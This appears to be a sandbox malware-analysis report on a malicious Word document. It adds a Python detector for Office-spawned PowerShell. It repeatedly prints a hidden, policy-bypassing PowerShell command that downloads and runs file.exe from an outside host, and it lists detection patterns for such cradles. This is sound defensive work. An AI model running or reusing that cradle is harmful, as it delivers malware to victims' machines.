Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
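The process-creation records above show the whole chain: WINWORD.EXE spawns cmd.exe, which runs PowerShell with `-NoP -NonI -W Hidden -ExecutionPolicy bypass` and a `WebClient.DownloadFile` to `%APPDATA%\file.exe`, then cmd.exe again to launch that file; WINWORD.EXE also hands the dropped `.scT` scriptlet to notepad.exe. That parameter combination is what the `PowerShell_Susp_Parameter_Combo` and `Suspicious_PowerShell_WebDownload_1` rules matched in memory. The Python below is an added example, not part of Joe Sandbox or of this report: it parses the report's own spawn lines (copied here with duplicates removed), rebuilds parent-to-child edges and tags every child of an Office process with the traits its command line exhibits. The trait names, their regular expressions and the Office image list are the example's own choices.

```python
"""Detection over a sandbox process tree: Office-spawned PowerShell download cradles.

Joe Sandbox writes one record per spawn:
    Source: <parent image>Process created: <child image> <command line>
This rebuilds parent->child edges from those records, tags each command line
with the traits seen in this report (hidden window, bypassed execution policy,
WebClient download, execution from a user-writable path, a .sct scriptlet) and
reports every child of an Office process together with its traits.
"""
import re

# Constructed from the process-creation lines of this report, duplicates removed.
PROCESS_LINES = r"""
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
""".strip().splitlines()

# Child image ends at the first '.exe'; everything after it is the command line.
_SPAWN_RE = re.compile(r"^Source: (.*?)Process created: (.+?\.exe)\s+(.*)$", re.IGNORECASE)

# Trait names and patterns are this example's own; PowerShell accepts any
# unambiguous prefix of a parameter name, hence the \w* after each short form.
TRAITS = {
    "no_profile":         re.compile(r"-NoP\w*", re.I),
    "non_interactive":    re.compile(r"-NonI\w*", re.I),
    "hidden_window":      re.compile(r"-W\w*\s+Hidden\b", re.I),
    "policy_bypass":      re.compile(r"-E\w*\s+Bypass\b", re.I),
    "download_cradle":    re.compile(r"\b(?:DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|Start-BitsTransfer)\b", re.I),
    "user_writable_exec": re.compile(r"\\AppData\\(?:Roaming|Local)\\[^\s\"']*\.exe\b", re.I),
    "scriptlet_file":     re.compile(r"\.sct\b", re.I),
}
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def image_name(path):
    """Lower-cased file name of a Windows path ('unknown' stays 'unknown')."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_process_tree(lines):
    """Return (parent_image, child_image, command_line) for every spawn record."""
    edges = []
    for line in lines:
        m = _SPAWN_RE.match(line.strip())
        if m:
            parent, child, cmdline = m.groups()
            edges.append((image_name(parent), image_name(child), cmdline))
    return edges


def classify(cmdline):
    """Sorted list of trait names whose pattern occurs in the command line."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(cmdline))


def office_child_findings(edges):
    """One finding per process spawned directly by an Office application."""
    return [{"parent": p, "child": c, "traits": classify(cmd)}
            for p, c, cmd in edges if p in OFFICE_IMAGES]


def is_office_download_cradle(findings):
    """Office -> shell with a download primitive and a bypassed execution policy."""
    return any({"download_cradle", "policy_bypass"} <= set(f["traits"]) for f in findings)


if __name__ == "__main__":
    findings = office_child_findings(parse_process_tree(PROCESS_LINES))
    for f in findings:
        print(f"{f['parent']} -> {f['child']}: {', '.join(f['traits']) or 'no traits'}")
    print("office download cradle:", is_office_download_cradle(findings))
```

Because the report lines carry no PIDs, the cmd.exe -> powershell.exe edge cannot be tied to a specific cmd.exe instance; the detection therefore keys on the cmd.exe command line WINWORD.EXE launched, which already contains the full PowerShell invocation. On endpoint telemetry with process IDs the same traits would be evaluated along the resolved ancestry instead.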
Source: C:\Users\user\AppData\Roaming\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: TEPO0015922.LNK.0.drLNK file: ..\..\..\..\..\Desktop\TEPO0015922.doc
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO0015922.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63F0.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@29/33@2/1
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00402173 CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: Yara match | File source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') (6 occurrences)
Source: libgdk_pixbuf-2.0-0.dll.9.dr | Static PE information: section name: .xdata
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') (6 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\file.exe
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
